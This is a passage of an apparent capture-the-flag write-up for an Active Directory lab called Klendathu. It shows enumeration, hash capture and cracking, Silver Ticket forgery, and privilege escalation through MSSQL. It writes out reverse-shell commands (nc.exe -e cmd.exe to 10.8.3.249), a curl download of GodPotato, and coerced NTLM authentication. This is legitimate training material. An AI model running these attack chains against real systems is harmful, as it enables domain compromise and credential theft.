class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu bloodhound-python -d <span class="string">&#x27;KLENDATHU.VL&#x27;</span> -u <span class="string">&#x27;zim&#x27;</span> -p <span class="string">&#x27;[........]&#x27;</span> -c all -ns 10.10.137.37 --zip</span><br><span class="line">INFO: Found AD domain: klendathu.vl</span><br><span class="line">INFO: Getting TGT <span class="keyword">for</span> user</span><br><span class="line">WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc1.klendathu.vl:88)] [Errno -2] Name or service not known</span><br><span class="line">INFO: Connecting to LDAP server: dc1.klendathu.vl</span><br><span class="line">INFO: Found 1 domains</span><br><span class="line">INFO: Found 1 domains <span class="keyword">in</span> the forest</span><br><span class="line">INFO: Found 4 computers</span><br><span class="line">INFO: Connecting to LDAP server: dc1.klendathu.vl</span><br><span class="line">INFO: Found 26 <span class="built_in">users</span></span><br><span class="line">INFO: Found 57 <span class="built_in">groups</span></span><br><span class="line">INFO: Found 6 gpos</span><br><span class="line">INFO: Found 1 ous</span><br><span class="line">INFO: Found 19 containers</span><br><span class="line">INFO: Found 0 trusts</span><br><span class="line">INFO: Starting computer enumeration with 10 workers</span><br><span class="line">INFO: Querying computer: srv2.klendathu.vl</span><br><span class="line">INFO: Querying computer: SRV1.KLENDATHU.VL</span><br><span class="line">INFO: Querying computer: WS1.KLENDATHU.VL</span><br><span class="line">INFO: Querying computer: DC1.KLENDATHU.VL</span><br><span class="line">INFO: Done <span class="keyword">in</span> 00M 34S</span><br><span class="line">INFO: Compressing output into 20241017100651_bloodhound.zip</span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><p>Next, we enumerated the SMB shares to check for access:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">➜ klendathu nxc smb IPs -u users.txt -p pass.txt --shares  </span><br><span class="line">SMB         10.10.137.38    445    SRV1             [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.137.37    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.137.38    445    SRV1             [+] KLENDATHU.VL\zim:[.........] </span><br><span class="line">SMB         10.10.137.37    445    DC1              [+] KLENDATHU.VL\zim:[.........] </span><br><span class="line">SMB         10.10.137.38    445    SRV1             [*] Enumerated shares</span><br><span class="line">SMB         10.10.137.38    445    SRV1             Share           Permissions     Remark</span><br><span class="line">SMB         10.10.137.38    445    SRV1             -----           -----------     ------</span><br><span class="line">SMB         10.10.137.38    445    SRV1             ADMIN$                          Remote Admin</span><br><span class="line">SMB         10.10.137.38    445    SRV1             C$                              Default share</span><br><span class="line">SMB         10.10.137.38    445    SRV1             IPC$            READ            Remote IPC</span><br><span class="line">SMB         10.10.137.37    445    DC1              [*] Enumerated shares</span><br><span class="line">SMB         10.10.137.37    445    DC1              Share           Permissions     Remark</span><br><span class="line">SMB         10.10.137.37    445    DC1              -----           -----------     ------</span><br><span class="line">SMB         10.10.137.37    445    DC1              ADMIN$                          Remote Admin</span><br><span class="line">SMB         10.10.137.37    445    DC1              C$                              Default share</span><br><span class="line">SMB         10.10.137.37    445    DC1              HomeDirs        READ,WRITE      </span><br><span class="line">SMB         10.10.137.37    445    DC1              IPC$            READ            Remote IPC</span><br><span class="line">SMB         10.10.137.37    445    DC1              NETLOGON        READ            Logon server share</span><br><span class="line">SMB         10.10.137.37    445    DC1              SYSVOL          READ            Logon server share</span><br><span class="line">Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00</span><br></pre></td></tr></table></figure></div><p>After successfully authenticating with the credentials <code>KLENDATHU.VL\zim:[........]</code>, we tried to access the <code>HomeDirs</code> share on <strong>DC1</strong>:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">➜ klendathu smbclient \\\\10.10.137.37\\HomeDirs -U zim</span><br><span class="line">Password <span class="keyword">for</span> [WORKGROUP\zim]:</span><br><span class="line">Try <span class="string">&quot;help&quot;</span> to get a list of possible commands.</span><br><span class="line">smb: \&gt; <span class="built_in">ls</span></span><br><span class="line">  .                                   D        0  Thu Oct 17 10:09:02 2024</span><br><span class="line">  ..                                  D        0  Mon Apr 15 12:09:19 2024</span><br><span class="line">  CLEA                                D        0  Wed Apr 10 20:58:09 2024</span><br><span class="line">  DUNN                                D        0  Wed Apr 10 20:58:03 2024</span><br><span class="line">  JENKINS                             D        0  Fri Apr 12 21:32:21 2024</span><br><span class="line">  SHUJUMI                             D        0  Wed Apr 10 20:57:12 2024</span><br><span class="line">smb: \&gt; <span class="built_in">cd</span> CLEA</span><br><span class="line">smb: \CLEA\&gt; <span class="built_in">ls</span></span><br><span class="line">NT_STATUS_ACCESS_DENIED listing \CLEA\*</span><br><span class="line">smb: \&gt; <span class="built_in">cd</span> ../DUNN</span><br><span class="line">smb: \DUNN\&gt; <span class="built_in">ls</span></span><br><span class="line">NT_STATUS_ACCESS_DENIED listing \DUNN\*</span><br><span class="line"></span><br><span class="line">smb: \&gt; <span class="built_in">cd</span> ../SHUJUMI</span><br><span class="line">smb: \SHUJUMI\&gt; <span class="built_in">ls</span></span><br><span class="line">NT_STATUS_ACCESS_DENIED listing \SHUJUMI\*</span><br><span class="line"></span><br><span class="line">smb: \&gt; <span class="built_in">cd</span> ../JENKINS</span><br><span class="line">smb: \JENKINS\&gt; <span class="built_in">ls</span></span><br><span class="line">NT_STATUS_ACCESS_DENIED listing \JENKINS\*</span><br><span class="line">smb: \&gt; <span class="built_in">exit</span></span><br><span class="line">➜ klendathu </span><br></pre></td></tr></table></figure></div><h4 id="MSSQL-Enumeration"><a href="#MSSQL-Enumeration" class="headerlink" title="MSSQL Enumeration"></a>MSSQL Enumeration</h4><p>Decided to check for MSSQL access using the same credentials we used for SMB. Ran the following command:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜ klendathu nxc mssql IPs -u users.txt -p pass.txt     </span><br><span class="line">MSSQL       10.10.137.38    1433   SRV1             [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL)</span><br><span class="line">MSSQL       10.10.137.38    1433   SRV1             [+] KLENDATHU.VL\zim:[........] </span><br></pre></td></tr></table></figure></div><p>Connected to MSSQL with <code>impacket-mssqlclient</code> tool to connect to the SQL Server using the credentials we confirmed earlier.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">➜ klendathu impacket-mssqlclient KLENDATHU.VL/zim:[........]@10.10.137.38 -windows-auth </span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Encryption required, switching to TLS</span><br><span class="line">[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master</span><br><span class="line">[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english</span><br><span class="line">[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192</span><br><span class="line">[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to <span class="string">&#x27;master&#x27;</span>.</span><br><span class="line">[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.</span><br><span class="line">[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) </span><br><span class="line">[!] Press <span class="built_in">help</span> <span class="keyword">for</span> extra shell commands</span><br><span class="line">SQL (KLENDATHU\ZIM  guest@master)&gt; </span><br></pre></td></tr></table></figure></div><p>After connecting to the MSSQL database, I tried to enable the <code>xp_cmdshell</code> feature, which allows the execution of operating system commands directly from SQL Server. </p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">SQL (KLENDATHU\ZIM guest@master)&gt; enable_xp_cmdshell</span><br><span class="line">ERROR(SRV1\SQLEXPRESS): Line 105: User does not have permission to perform this action.</span><br><span class="line">ERROR(SRV1\SQLEXPRESS): Line 1: You <span class="keyword">do</span> not have permission to run the RECONFIGURE statement.</span><br><span class="line">ERROR(SRV1\SQLEXPRESS): Line 62: The configuration option <span class="string">&#x27;xp_cmdshell&#x27;</span> does not exist, or it may be an advanced option.</span><br><span class="line">ERROR(SRV1\SQLEXPRESS): Line 1: You <span class="keyword">do</span> not have permission to run the RECONFIGURE statement.</span><br><span class="line">SQL (KLENDATHU\ZIM  guest@master)&gt;</span><br></pre></td></tr></table></figure></div><p>enable_xp_cmdshell indicated that the current user (KLENDATHU.VL\zim) does not have the necessary permissions to enable xp_cmdshell or execute configuration changes within the database.</p><p>Tried executing several commands to check for file existence and directory structure on a remote file share to get a hash into our reponder.</p><p>Commands used:</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">SQL (KLENDATHU\ZIM guest@master)&gt; SELECT * FROM OPENROWSET(BULK &#x27;\\10.8.3.249\test\file.txt&#x27;, SINGLE_CLOB) AS FileContent;</span><br><span class="line">ERROR(SRV1\SQLEXPRESS): Line 1: You do not have permission to use the bulk load statement.</span><br><span class="line">SQL (KLENDATHU\ZIM  guest@master)&gt; EXEC xp_fileexist &#x27;\\10.8.3.249\test\file.txt&#x27;;</span><br><span class="line">File Exists   File is a Directory   Parent Directory Exists   </span><br><span class="line">-----------   -------------------   -----------------------   </span><br><span class="line">          0                     0                         0   </span><br><span class="line"></span><br><span class="line">SQL (KLENDATHU\ZIM  guest@master)&gt; EXEC xp_subdirs &#x27;\\10.8.3.249\test&#x27;;</span><br><span class="line">ERROR(SRV1\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object &#x27;xp_subdirs&#x27;, database &#x27;mssqlsystemresource&#x27;, schema &#x27;sys&#x27;.</span><br><span class="line">SQL (KLENDATHU\ZIM  guest@master)&gt; exec master.dbo.xp_dirtree &#x27;\\10.8.3.249\test&#x27;</span><br><span class="line">ERROR(SRV1\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object &#x27;xp_dirtree&#x27;, database &#x27;mssqlsystemresource&#x27;, schema &#x27;sys&#x27;. </span><br><span class="line">SQL (KLENDATHU\ZIM  guest@master)&gt; </span><br></pre></td></tr></table></figure></div><p>All attempts resulted in permission denied errors. After that I found and article in <a class="link"   href="https://learn.microsoft.com/en-us/answers/questions/421347/extended-stored-procedure-xp-fileexist-appears-to" >Microsoft Q&amp;A article<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SQL (KLENDATHU\ZIM  guest@master)&gt; SELECT * FROM sys.dm_os_file_exists(<span class="string">&#x27;\\10.8.3.249\test&#x27;</span>);</span><br><span class="line">ERROR(SRV1\SQLEXPRESS): Line 1: The operating system returned the error <span class="string">&#x27;0x80070005(Access is denied.)&#x27;</span> <span class="keyword">while</span> attempting <span class="string">&#x27;SvlPathDoesPathExist&#x27;</span> on <span class="string">&#x27;\\10.8.3.249\test&#x27;</span>.</span><br><span class="line">file_exists   file_is_a_directory   parent_directory_exists   </span><br><span class="line">-----------   -------------------   -----------------------   </span><br><span class="line">SQL (KLENDATHU\ZIM  guest@master)&gt; </span><br></pre></td></tr></table></figure></div><p>With this command i got a hash in my responder:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[SMB] NTLMv2-SSP Client   : 10.10.137.38</span><br><span class="line">[SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK</span><br><span class="line">[SMB] NTLMv2-SSP Hash     : RASCZAK::KLENDATHU:db7d3a8ee532ab62:39360CCAB98DE3790BE773BEC3CF210A:01010000000000008003C7587D20DB01D604006EFF0421140000000002000800520036004E004D0001001E00570049004E002D004F004E0044005000380034004300510047004500530004003410570049004E002D004F004E004400500038003400430051004700450053002E00520036004E004D002E004C003F00430041004C0003001411520036004E004D002E004C004F00430041004C0005001400520036004E004D011E004C004F00430041004C00070008008003C7587D20DB01060004000200000008003000300000000000000000000000003000003350431E58E5B73E4C543F46D800E8C334EA912E1A6876003674C6CA15D26FE10A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0033002E003200340039000000000000000000</span><br></pre></td></tr></table></figure></div><p>And also a new user named RASCZAK and the hash associated with this user and I proceeded to crack it using <strong>John</strong>.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜ klendathu john <span class="built_in">hash</span> --wordlist=/usr/share/wordlists/rockyou.txt</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])</span><br><span class="line">Will run 12 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">[..........]       (RASCZAK)</span><br><span class="line">1g 0:00:00:02 DONE (2024-11-01 22:29) 0.4347g/s 547617p/s 547617c/s 547617C/s stw1011..starburstclick</span><br><span class="line">Use the <span class="string">&quot;--show --format=netntlmv2&quot;</span> options to display all of the cracked passwords reliably</span><br><span class="line">Session completed.</span><br><span class="line">➜ klendathu </span><br></pre></td></tr></table></figure></div><p>After cracking the password for the new user RASCZAK, I attempted to authenticate with MSSQL using netexec:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu nxc mssql IPs -u users.txt -p pass.txt --continue-on-success</span><br><span class="line">MSSQL       10.10.137.38    1433   SRV1             [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL)</span><br><span class="line">MSSQL       10.10.137.38    1433   SRV1             [+] KLENDATHU.VL\zim:[......] </span><br><span class="line">MSSQL       10.10.137.38    1433   SRV1             [-] KLENDATHU.VL\RASCZAK:[.......] (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without <span class="string">&#x27;--local-auth&#x27;</span>)</span><br><span class="line">MSSQL       10.10.137.38    1433   SRV1             [+] KLENDATHU.VL\RASCZAK:[........] </span><br><span class="line">Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00</span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><p>The authentication was successful when using the password <code>[.......]</code> with user <code>RASCZAK</code><br>Using impacket-ticketer, I generated a Silver Ticket to impersonate the administrator by forging a Ticket Granting Service (TGS) ticket with the NTLM hash of the MSSQL service account, domain sid and user to impersonate, in our case administrator.</p><h4 id="Silver-ticket-generation"><a href="#Silver-ticket-generation" class="headerlink" title="Silver ticket generation"></a>Silver ticket generation</h4><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu impacket-ticketer -nthash e2f156af0fa3ac2b167fr48add53d72c -spn MSSQLSvc/SRV1.KLENDATHU.VL -domain KLENDATHU.VL -domain-sid S-1-5-21-641880747-1618203462-755020521 administrator</span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Creating basic skeleton ticket and PAC Infos</span><br><span class="line">[*] Customizing ticket <span class="keyword">for</span> KLENDATHU.VL/administrator</span><br><span class="line">[*]     PAC_LOGON_INFO</span><br><span class="line">[*]     PAC_CLIENT_INFO_TYPE</span><br><span class="line">[*]     EncTicketPart</span><br><span class="line">[*]     EncTGSRepPart</span><br><span class="line">[*] Signing/Encrypting final ticket</span><br><span class="line">[*]     PAC_SERVER_CHECKSUM</span><br><span class="line">[*]     PAC_PRIVSVR_CHECKSUM</span><br><span class="line">[*]     EncTicketPart</span><br><span class="line">[*]     EncTGSRepPart</span><br><span class="line">[*] Saving ticket <span class="keyword">in</span> administrator.ccache</span><br></pre></td></tr></table></figure></div><h2 id="User"><a href="#User" class="headerlink" title="User"></a>User</h2><p>And we got <code>administrator.ccache</code> ticket and connected to mssql using that ticket with <code>-k</code> flag.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu impacket-mssqlclient srv1.KLENDATHU.VL -windows-auth -k</span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Encryption required, switching to TLS</span><br><span class="line">[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master</span><br><span class="line">[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english</span><br><span class="line">[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192</span><br><span class="line">[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to <span class="string">&#x27;master&#x27;</span>.</span><br><span class="line">[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.</span><br><span class="line">[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) </span><br><span class="line">[!] Press <span class="built_in">help</span> <span class="keyword">for</span> extra shell commands</span><br><span class="line">SQL (KLENDATHU.VL\Administrator  dbo@master)&gt; enable_xp_cmdshell</span><br><span class="line">INFO(SRV1\SQLEXPRESS): Line 196: Configuration option <span class="string">&#x27;show advanced options&#x27;</span> changed from 0 to 1. Run the RECONFIGURE statement to install.</span><br><span class="line">INFO(SRV1\SQLEXPRESS): Line 196: Configuration option <span class="string">&#x27;xp_cmdshell&#x27;</span> changed from 0 to 1. Run the RECONFIGURE statement to install.</span><br><span class="line">SQL (KLENDATHU.VL\Administrator  dbo@master)&gt; </span><br></pre></td></tr></table></figure></div><p>After enabling <code>xp_cmdshell</code><br>Transffered <code>nc.exe</code> to the machine to move further</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SQL (KLENDATHU.VL\Administrator  dbo@master)&gt; xp_cmdshell <span class="string">&quot;C:/Users/rasczak/Documents/nc.exe 10.8.3.249 8989 -e cmd.exe&quot;</span></span><br></pre></td></tr></table></figure></div><p>And we got a shell as user <code>RASCZAK</code></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu nc -nvlp 8989            </span><br><span class="line">Listening on 0.0.0.0 8989</span><br><span class="line">Connection received on 10.10.137.38 54699</span><br><span class="line">Microsoft Windows [Version 10.0.20348.2402]</span><br><span class="line">(c) Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;<span class="built_in">cd</span> ../</span><br><span class="line"><span class="built_in">cd</span> ../</span><br><span class="line"></span><br><span class="line">C:\Windows&gt;<span class="built_in">cd</span> ../Users</span><br><span class="line"><span class="built_in">cd</span> ../Users</span><br><span class="line"></span><br><span class="line">C:\Users&gt;<span class="built_in">dir</span></span><br><span class="line"><span class="built_in">dir</span></span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number is A401-AF84</span><br><span class="line"></span><br><span class="line"> Directory of C:\Users</span><br><span class="line"></span><br><span class="line">04/10/2024  11:33 PM    &lt;DIR&gt;          .</span><br><span class="line">04/10/2024  06:52 PM    &lt;DIR&gt;          Administrator</span><br><span class="line">04/10/2024  07:33 PM    &lt;DIR&gt;          administrator.KLENDATHU</span><br><span class="line">04/10/2024  06:52 PM    &lt;DIR&gt;          Public</span><br><span class="line">04/10/2024  11:33 PM    &lt;DIR&gt;          RASCZAK</span><br><span class="line">               0 File(s)              0 bytes</span><br><span class="line">               5 Dir(s)   9,346,953,216 bytes free</span><br><span class="line"></span><br><span class="line">C:\Users\RASCZAK\Documents&gt;<span class="built_in">whoami</span> /priv</span><br><span class="line"><span class="built_in">whoami</span> /priv</span><br><span class="line"></span><br><span class="line">PRIVILEGES INFORMATION</span><br><span class="line">----------------------</span><br><span class="line"></span><br><span class="line">Privilege Name                Description                               State   </span><br><span class="line">============================= ========================================= ========</span><br><span class="line">SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled</span><br><span class="line">SeIncreaseQuotaPrivilege      Adjust memory quotas <span class="keyword">for</span> a process        Disabled</span><br><span class="line">SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled </span><br><span class="line">SeImpersonatePrivilege        Impersonate a client after authentication Enabled </span><br><span class="line">SeCreateGlobalPrivilege       Create global objects                     Enabled </span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a process working <span class="built_in">set</span>            Disabled</span><br><span class="line"></span><br><span class="line">C:\Users\RASCZAK\Documents&gt;</span><br></pre></td></tr></table></figure></div><h2 id="Privilege-escalation"><a href="#Privilege-escalation" class="headerlink" title="Privilege escalation"></a>Privilege escalation</h2><p>After checking for Privilege we have we saw we have <code>SeImpersonatePrivilege</code> which can be abused using <code>GodPotato</code><br>We transffered GodPotato to our machine. </p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\RASCZAK\Documents&gt;curl http://10.8.3.249:1337/GodPotato-NET4.exe -o gp.exe</span><br><span class="line">curl http://10.8.3.249:1337/GodPotato-NET4.exe -o gp.exe</span><br><span class="line"><span class="meta prompt_">  % </span><span class="language-bash">Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</span></span><br><span class="line">                                 Dload  Upload   Total   Spent    Left  Speed</span><br><span class="line">100 57344  100 57344    0     0  92437      0 --:--:-- --:--:-- --:--:-- 92490</span><br><span class="line">C:\Users\RASCZAK\Documents&gt;gp.exe -cmd &quot;nc.exe -t -e C:\Windows\System32\cmd.exe 10.8.3.249 4444&quot;</span><br><span class="line">gp.exe -cmd &quot;nc.exe -t -e C:\Windows\System32\cmd.exe 10.8.3.249 4444&quot;</span><br><span class="line">[*] CombaseModule: 0x140737287684096</span><br><span class="line">[*] DispatchTable: 0x140737290271048</span><br><span class="line">[*] UseProtseqFunction: 0x140737289566432</span><br><span class="line">[*] UseProtseqFunctionParamCount: 6</span><br><span class="line">[*] HookRPC</span><br><span class="line">[*] Start PipeServer</span><br><span class="line">[*] Trigger RPCSS</span><br><span class="line">[*] CreateNamedPipe \\.\pipe\dcc010ca-70c4-4809-b3eb-b98c336f30a4\pipe\epmapper</span><br><span class="line">[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046</span><br><span class="line">[*] DCOM obj IPID: 0000c002-087c-ffff-3058-63ad1b8dace7</span><br><span class="line">[*] DCOM obj OXID: 0x6e13b702001531c1</span><br><span class="line">[*] DCOM obj OID: 0x49b46127acfca87b</span><br><span class="line">[*] DCOM obj Flags: 0x281</span><br><span class="line">[*] DCOM obj PublicRefs: 0x0</span><br><span class="line">[*] Marshal Object bytes len: 100</span><br><span class="line">[*] UnMarshal Object</span><br><span class="line">[*] Pipe Connected!</span><br><span class="line">[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE</span><br><span class="line">[*] CurrentsImpersonationLevel: Impersonation</span><br><span class="line">[*] Start Search System Token</span><br><span class="line">[*] PID : 884 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation</span><br><span class="line">[*] Find System Token : True</span><br><span class="line">[*] UnmarshalObject: 0x80070776</span><br><span class="line">[*] CurrentUser: NT AUTHORITY\SYSTEM</span><br><span class="line">[*] process start with pid 624</span><br></pre></td></tr></table></figure></div><p>And used GodPotato to get next shell as administrator and first flag.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span 